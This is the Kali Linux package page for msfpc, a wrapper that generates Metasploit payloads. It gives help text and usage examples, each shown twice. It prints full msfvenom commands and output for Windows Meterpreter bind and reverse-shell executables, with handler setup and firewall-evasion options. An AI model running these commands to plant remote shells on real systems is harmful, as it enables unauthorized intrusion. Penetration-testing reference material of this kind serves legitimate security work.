msfpc Package Description
MSFvenom Payload Creator (MSFPC) is a wrapper that generates multiple types of payloads, based on user-selected options. The idea is to be as simple as possible (using as few as one option) to produce a payload.
Fully automating msfvenom & Metasploit is the end goal (well as to be be able to automate MSFPC itself). The rest is to make the user’s life as easy as possible (e.g. IP selection menu, msfconsole resource file/commands, batch payload production and able to enter any argument in any order (in various formats/patterns)).
Source: https://github.com/g0tmi1k/mpc
MSFPC Homepage | Kali msfpc Repo
- Author: g0tmi1k
- License: MIT
Tools included in the msfpc package
msfpc – Msfvenom Payload Creator (MPC)
root@kali:~# msfpc -h
[*] MSFvenom Payload Creator (MSFPC v1.4.4)
/usr/bin/msfpc <TYPE> (<DOMAIN/IP>) (<PORT>) (<CMD/MSF>) (<BIND/REVERSE>) (<STAGED/STAGELESS>) (<TCP/HTTP/HTTPS/FIND_PORT>) (<BATCH/LOOP>) (<VERBOSE>)
Example: /usr/bin/msfpc windows 192.168.1.10 # Windows & manual IP.
/usr/bin/msfpc elf bind eth0 4444 # Linux, eth0's IP & manual port.
/usr/bin/msfpc stageless cmd py https # Python, stageless command prompt.
/usr/bin/msfpc verbose loop eth1 # A payload for every type, using eth1's IP.
/usr/bin/msfpc msf batch wan # All possible Meterpreter payloads, using WAN IP.
/usr/bin/msfpc help verbose # Help screen, with even more information.
<TYPE>:
+ APK
+ ASP
+ ASPX
+ Bash [.sh]
+ Java [.jsp]
+ Linux [.elf]
+ OSX [.macho]
+ Perl [.pl]
+ PHP
+ Powershell [.ps1]
+ Python [.py]
+ Tomcat [.war]
+ Windows [.exe // .dll]
Rather than putting <DOMAIN/IP>, you can do a interface and MSFPC will detect that IP address.
Missing <DOMAIN/IP> will default to the IP menu.
Missing <PORT> will default to 443.
<CMD> is a standard/native command prompt/terminal to interactive with.
<MSF> is a custom cross platform shell, gaining the full power of Metasploit.
Missing <CMD/MSF> will default to <MSF> where possible.
<BIND> opens a port on the target side, and the attacker connects to them. Commonly blocked with ingress firewalls rules on the target.
<REVERSE> makes the target connect back to the attacker. The attacker needs an open port. Blocked with engress firewalls rules on the target.
Missing <BIND/REVERSE> will default to <REVERSE>.
<STAGED> splits the payload into parts, making it smaller but dependent on Metasploit.
<STAGELESS> is the complete standalone payload. More 'stable' than <STAGED>.
Missing <STAGED/STAGELESS> will default to <STAGED> where possible.
<TCP> is the standard method to connecting back. This is the most compatible with TYPES as its RAW. Can be easily detected on IDSs.
<HTTP> makes the communication appear to be HTTP traffic (unencrypted). Helpful for packet inspection, which limit port access on protocol - e.g. TCP 80.
<HTTPS> makes the communication appear to be (encrypted) HTTP traffic using as SSL. Helpful for packet inspection, which limit port access on protocol - e.g. TCP 443.
<FIND_PORT> will attempt every port on the target machine, to find a way out. Useful with stick ingress/engress firewall rules. Will switch to 'allports' based on <TYPE>.
Missing <TCP/HTTP/HTTPS/FIND_PORT> will default to <TCP>.
<BATCH> will generate as many combinations as possible: <TYPE>, <CMD + MSF>, <BIND + REVERSE>, <STAGED + STAGLESS> & <TCP + HTTP + HTTPS + FIND_PORT>
<LOOP> will just create one of each <TYPE>.
<VERBOSE> will display more information.
[*] MSFvenom Payload Creator (MSFPC v1.4.4)
/usr/bin/msfpc <TYPE> (<DOMAIN/IP>) (<PORT>) (<CMD/MSF>) (<BIND/REVERSE>) (<STAGED/STAGELESS>) (<TCP/HTTP/HTTPS/FIND_PORT>) (<BATCH/LOOP>) (<VERBOSE>)
Example: /usr/bin/msfpc windows 192.168.1.10 # Windows & manual IP.
/usr/bin/msfpc elf bind eth0 4444 # Linux, eth0's IP & manual port.
/usr/bin/msfpc stageless cmd py https # Python, stageless command prompt.
/usr/bin/msfpc verbose loop eth1 # A payload for every type, using eth1's IP.
/usr/bin/msfpc msf batch wan # All possible Meterpreter payloads, using WAN IP.
/usr/bin/msfpc help verbose # Help screen, with even more information.
<TYPE>:
+ APK
+ ASP
+ ASPX
+ Bash [.sh]
+ Java [.jsp]
+ Linux [.elf]
+ OSX [.macho]
+ Perl [.pl]
+ PHP
+ Powershell [.ps1]
+ Python [.py]
+ Tomcat [.war]
+ Windows [.exe // .dll]
Rather than putting <DOMAIN/IP>, you can do a interface and MSFPC will detect that IP address.
Missing <DOMAIN/IP> will default to the IP menu.
Missing <PORT> will default to 443.
<CMD> is a standard/native command prompt/terminal to interactive with.
<MSF> is a custom cross platform shell, gaining the full power of Metasploit.
Missing <CMD/MSF> will default to <MSF> where possible.
<BIND> opens a port on the target side, and the attacker connects to them. Commonly blocked with ingress firewalls rules on the target.
<REVERSE> makes the target connect back to the attacker. The attacker needs an open port. Blocked with engress firewalls rules on the target.
Missing <BIND/REVERSE> will default to <REVERSE>.
<STAGED> splits the payload into parts, making it smaller but dependent on Metasploit.
<STAGELESS> is the complete standalone payload. More 'stable' than <STAGED>.
Missing <STAGED/STAGELESS> will default to <STAGED> where possible.
<TCP> is the standard method to connecting back. This is the most compatible with TYPES as its RAW. Can be easily detected on IDSs.
<HTTP> makes the communication appear to be HTTP traffic (unencrypted). Helpful for packet inspection, which limit port access on protocol - e.g. TCP 80.
<HTTPS> makes the communication appear to be (encrypted) HTTP traffic using as SSL. Helpful for packet inspection, which limit port access on protocol - e.g. TCP 443.
<FIND_PORT> will attempt every port on the target machine, to find a way out. Useful with stick ingress/engress firewall rules. Will switch to 'allports' based on <TYPE>.
Missing <TCP/HTTP/HTTPS/FIND_PORT> will default to <TCP>.
<BATCH> will generate as many combinations as possible: <TYPE>, <CMD + MSF>, <BIND + REVERSE>, <STAGED + STAGLESS> & <TCP + HTTP + HTTPS + FIND_PORT>
<LOOP> will just create one of each <TYPE>.
<VERBOSE> will display more information.
msfpc Usage Examples
Semi-interactively create a Windows Meterpreter bind shell on port 5555.
root@kali:~# msfpc windows bind 5555 verbose
[*] MSFvenom Payload Creator (MSFPC v1.4.4)
[i] Use which interface - IP address?:
[i] 1.) lo - 127.0.0.1
[i] 2.) eth0 - 172.16.193.160
[i] 3.) wan - 68.151.240.61
[?] Select 1-3, interface or IP address: 2
[i] IP: 172.16.193.160
[i] PORT: 5555
[i] TYPE: windows (windows/meterpreter/bind_tcp)
[i] SHELL: meterpreter
[i] DIRECTION: bind
[i] STAGE: staged
[i] METHOD: tcp
[i] CMD: msfvenom -p windows/meterpreter/bind_tcp -f exe \
--platform windows -a x86 -e generic/none LPORT=5555 \
> '/root/windows-meterpreter-staged-bind-tcp-5555.exe'
[i] windows meterpreter created: '/root/windows-meterpreter-staged-bind-tcp-5555.exe'
[i] File: PE32 executable (GUI) Intel 80386, for MS Windows
[i] Size: 76K
[i] MD5: 5bdb434e053fa0a9894eb88720c09e2a
[i] SHA1: 9d51c45c76dfd947994cb4be61f5f9797b35167f
[i] MSF handler file: '/root/windows-meterpreter-staged-bind-tcp-5555-exe.rc'
[i] Run: msfconsole -q -r '/root/windows-meterpreter-staged-bind-tcp-5555-exe.rc'
[?] Quick web server (for file transfer)?: python2 -m SimpleHTTPServer 8080
[*] Done!
[*] MSFvenom Payload Creator (MSFPC v1.4.4)
[i] Use which interface - IP address?:
[i] 1.) lo - 127.0.0.1
[i] 2.) eth0 - 172.16.193.160
[i] 3.) wan - 68.151.240.61
[?] Select 1-3, interface or IP address: 2
[i] IP: 172.16.193.160
[i] PORT: 5555
[i] TYPE: windows (windows/meterpreter/bind_tcp)
[i] SHELL: meterpreter
[i] DIRECTION: bind
[i] STAGE: staged
[i] METHOD: tcp
[i] CMD: msfvenom -p windows/meterpreter/bind_tcp -f exe \
--platform windows -a x86 -e generic/none LPORT=5555 \
> '/root/windows-meterpreter-staged-bind-tcp-5555.exe'
[i] windows meterpreter created: '/root/windows-meterpreter-staged-bind-tcp-5555.exe'
[i] File: PE32 executable (GUI) Intel 80386, for MS Windows
[i] Size: 76K
[i] MD5: 5bdb434e053fa0a9894eb88720c09e2a
[i] SHA1: 9d51c45c76dfd947994cb4be61f5f9797b35167f
[i] MSF handler file: '/root/windows-meterpreter-staged-bind-tcp-5555-exe.rc'
[i] Run: msfconsole -q -r '/root/windows-meterpreter-staged-bind-tcp-5555-exe.rc'
[?] Quick web server (for file transfer)?: python2 -m SimpleHTTPServer 8080
[*] Done!
Automatically generate a Windows reverse Meterpreter payload, using the IP address of the eth0 interface as the LHOST parameter.
root@kali:~# msfpc windows eth0
[*] MSFvenom Payload Creator (MSFPC v1.4.4)
[i] IP: 172.16.193.160
[i] PORT: 443
[i] TYPE: windows (windows/meterpreter/reverse_tcp)
[i] CMD: msfvenom -p windows/meterpreter/reverse_tcp -f exe \
--platform windows -a x86 -e generic/none LHOST=172.16.193.160 LPORT=443 \
> '/root/windows-meterpreter-staged-reverse-tcp-443.exe'
[i] windows meterpreter created: '/root/windows-meterpreter-staged-reverse-tcp-443.exe'
[i] MSF handler file: '/root/windows-meterpreter-staged-reverse-tcp-443-exe.rc'
[i] Run: msfconsole -q -r '/root/windows-meterpreter-staged-reverse-tcp-443-exe.rc'
[?] Quick web server (for file transfer)?: python2 -m SimpleHTTPServer 8080
[*] Done!
[*] MSFvenom Payload Creator (MSFPC v1.4.4)
[i] IP: 172.16.193.160
[i] PORT: 443
[i] TYPE: windows (windows/meterpreter/reverse_tcp)
[i] CMD: msfvenom -p windows/meterpreter/reverse_tcp -f exe \
--platform windows -a x86 -e generic/none LHOST=172.16.193.160 LPORT=443 \
> '/root/windows-meterpreter-staged-reverse-tcp-443.exe'
[i] windows meterpreter created: '/root/windows-meterpreter-staged-reverse-tcp-443.exe'
[i] MSF handler file: '/root/windows-meterpreter-staged-reverse-tcp-443-exe.rc'
[i] Run: msfconsole -q -r '/root/windows-meterpreter-staged-reverse-tcp-443-exe.rc'
[?] Quick web server (for file transfer)?: python2 -m SimpleHTTPServer 8080
[*] Done!
